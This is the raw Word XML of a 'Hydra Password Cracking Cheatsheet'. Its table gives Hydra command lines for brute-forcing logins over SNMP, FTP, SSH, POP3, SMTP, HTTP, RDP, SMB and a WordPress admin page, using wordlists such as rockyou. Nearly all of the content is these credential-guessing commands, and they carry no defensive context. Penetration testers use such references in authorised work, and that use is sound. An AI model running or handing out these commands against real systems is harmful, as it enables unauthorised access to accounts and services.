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9"/>
        <w:gridCol w:w="3641"/>
      </w:tblGrid>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F49D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2F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-P password-file.txt -v $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ip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snmp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brute force against SNMP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-t 1 -l admin -P /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usr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/share/wordlists/rockyou.txt -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vV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$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ip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ftp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Hydra FTP known user and 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rockyou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password list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-v -V -u -L users.txt -P passwords.txt -t 1 -u $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ip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SSH using list of users and passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-v -V -u -L users.txt -p "" -t 1 -u $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ip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SSH using a known password and a username list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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$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ip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-s 22 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ssh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-l -P big_wordlist.txt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SSH Against Known username on port 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:bookmarkStart w:id="0" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="0"/>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-l USERNAME -P /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usr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/share/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wordlistsnmap.lst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-f $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ip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pop3 -V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POP3 Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-P /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usr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/share/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wordlistsnmap.lst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$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ip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smtp -V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SMTP Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-L ./webapp.txt -P ./webapp.txt $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ip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http-get /admin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attack http get 401 login with a dictionary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-t 1 -V -f -l administrator -P /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usr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/share/wordlists/rockyou.txt rdp://$ip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Hydra attack Windows Remote Desktop with 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rockyou</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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-t 1 -V -f -l administrator -P /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usr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/share/wordlists/rockyou.txt $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ip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smb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Hydra brute force SMB user with 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rockyou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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F49DC" w:rsidRPr="002F49DC" w:rsidTr="002F4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hydra -l admin -P ./passwordlist.txt $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ip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-V http-form-post '/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wp-login.php:log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=^USER^&amp;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pwd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=^PASS^&amp;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wp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-submit=Log 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In&amp;testcookie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=</w:t>
            </w:r>
            <w:proofErr w:type="gram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1:S</w:t>
            </w:r>
            <w:proofErr w:type="gram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=Location'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49DC" w:rsidRPr="002F49DC" w:rsidRDefault="002F49DC" w:rsidP="002F49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Hydra brute force a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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Wordpress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002F49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admin login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002F49DC" w:rsidRDefault="002F49DC"/>
    <w:sectPr w:rsidR="002F49DC" w:rsidSect="002F49DC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C5C" w:rsidRDefault="00EC5C5C" w:rsidP="002F49DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EC5C5C" w:rsidRDefault="00EC5C5C" w:rsidP="002F4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C5C" w:rsidRDefault="00EC5C5C" w:rsidP="002F49DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EC5C5C" w:rsidRDefault="00EC5C5C" w:rsidP="002F4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9DC" w:rsidRPr="002F49DC" w:rsidRDefault="002F49DC">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="002F49DC">
      <w:rPr>
        <w:b/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t xml:space="preserve">Hydra Password Cracking </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="002F49DC">
      <w:rPr>
        <w:b/>
        <w:sz w:val="32"/>
      </w:rPr>
      <w:t>Cheatsheet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DC"/>
    <w:rsid w:val="002F49DC"/>
    <w:rsid w:val="00EC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29F9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7692A410-BE0D-4D94-9571-FD5AA58F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49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DC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F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Scott</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Austin Scott</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-22T17:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T17:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>